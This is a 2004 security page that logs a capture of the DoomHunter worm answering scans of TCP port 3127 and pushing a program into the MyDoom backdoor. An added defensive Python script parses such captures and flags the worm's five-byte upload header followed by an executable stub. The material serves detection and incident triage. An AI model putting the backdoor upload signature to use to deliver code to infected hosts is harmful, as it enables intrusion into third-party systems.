Link Logger for Windows

DoomHunter PortPeeker Capture

DoomHunter sends a program back in response to a scan of TCP port 3127 (i.e. a DoomJuice scan) and attempts to kill the infection and install itself on the infected system.

Port Peeker Capture of DoomHunter

TCP Connection Request
--- 12/02/2004 16:12:00.240

68.234.4.113 : 3593 TCP Connected ID = 5
--- 12/02/2004 16:12:00.330
Status Code: 0 OK

68.234.4.113 : 3593 TCP Data In Length 2920 bytes : MD5 = 4BC8611C0CCE43587385D8421E8B5E04
--- 12/02/2004 16:12:00.430

68.234.4.113 : 3593 TCP Data In Length 2205 bytes : MD5 = C4F635640ACD9EBFBE741B66B28022EE
--- 12/02/2004 16:12:05.788

68.234.4.113 : 3593 TCP Disconnected ID = 5
--- 12/02/2004 16:12:09.774
Status Code: 25088 [25088] (no description available)
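Added example (not code from Link Logger or PortPeeker): a Python triage script that parses capture text in the layout shown above, rebuilds each "TCP Data In" chunk from its hex rows, and flags a chunk that begins with the five-byte upload header that opens the first chunk of this capture (85 13 3C 9E A2) followed directly by the MZ DOS stub, which is how a DoomHunter-style push into the port 3127 backdoor appears on the wire. The sample capture, the 192.0.2.10 address and the treatment of the five-byte header as a fixed signature are assumptions.

```python
"""Added example (not Link Logger/PortPeeker code): parse PortPeeker-style capture text,
rebuild each 'TCP Data In' chunk from its hex rows, and flag a chunk that starts with the
5-byte upload header seen in the capture followed directly by an 'MZ' DOS stub."""
from __future__ import annotations
import re
from dataclasses import dataclass

UPLOAD_PREFIX = bytes.fromhex("85133c9ea2")  # header seen in the capture; assumed fixed
EVENT_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) : (?P<port>\d+) TCP "
    r"(?P<kind>Connected|Data In|Disconnected)(?: Length (?P<len>\d+) bytes)?")

# Constructed sample in the capture layout (RFC 5737 address), not the page's own data.
SAMPLE_CAPTURE = """\
192.0.2.10 : 3593 TCP Data In Length 21 bytes : MD5 = (omitted)
--- 12/02/2004 16:12:00.430
0000 85 13 3C 9E A2 4D 5A 90 00 03 00 00 00 04 00 00 ..<..MZ.........
0010 00 FF FF 00 00 .....

192.0.2.10 : 3593 TCP Data In Length 32 bytes : MD5 = (omitted)
--- 12/02/2004 16:12:05.788
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 54 68 69 73 20 70 72 6F 67 72 61 6D 20 00 00 00 This program ...

192.0.2.10 : 3593 TCP Disconnected ID = 5
--- 12/02/2004 16:12:09.774
"""


@dataclass
class DataIn:
    src_ip: str
    src_port: int
    declared_len: int
    payload: bytes = b""

    @property
    def complete(self) -> bool:  # every declared byte was recovered from the dump rows
        return len(self.payload) == self.declared_len

    @property
    def is_backdoor_upload(self) -> bool:  # 5-byte header immediately followed by MZ
        n = len(UPLOAD_PREFIX)
        return self.payload.startswith(UPLOAD_PREFIX) and self.payload[n:n + 2] == b"MZ"

    def strings(self, min_len: int = 6) -> list[str]:  # printable runs, as strings(1) lists
        return [r.decode("ascii") for r in re.findall(rb"[ -~]{%d,}" % min_len, self.payload)]


def _row_bytes(line: str) -> bytes:
    """Data bytes of one '0000 xx xx ... ascii' row; b'' for any other line."""
    toks = line.split()
    if len(toks) < 2 or not re.fullmatch(r"[0-9A-Fa-f]{4}", toks[0]):
        return b""  # timestamp, status or event line
    out = bytearray()
    for tok in toks[1:17]:  # at most 16 data bytes per row, then the ASCII column
        if not re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
            break
        out.append(int(tok, 16))
    return bytes(out)


def parse_capture(text: str) -> list[DataIn]:
    """Collect the 'Data In' events, capping each payload at its declared length."""
    events, current = [], None
    for raw in text.splitlines():
        m = EVENT_RE.match(raw.strip())
        if m:  # any event line closes the chunk being assembled
            current = DataIn(m["ip"], int(m["port"]), int(m["len"] or 0)) if m["kind"] == "Data In" else None
            if current is not None:
                events.append(current)
        elif current is not None:
            current.payload += _row_bytes(raw.strip())[:current.declared_len - len(current.payload)]
    return events
```

Run against the real capture text, the first chunk is flagged and its printable strings give a responder the worm's messages, file names and imported APIs without executing the binary.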
 

MyDoom.A and MyDoom.B worm Removal Tool from Microsoft

 

Page last updated on February 12, 2004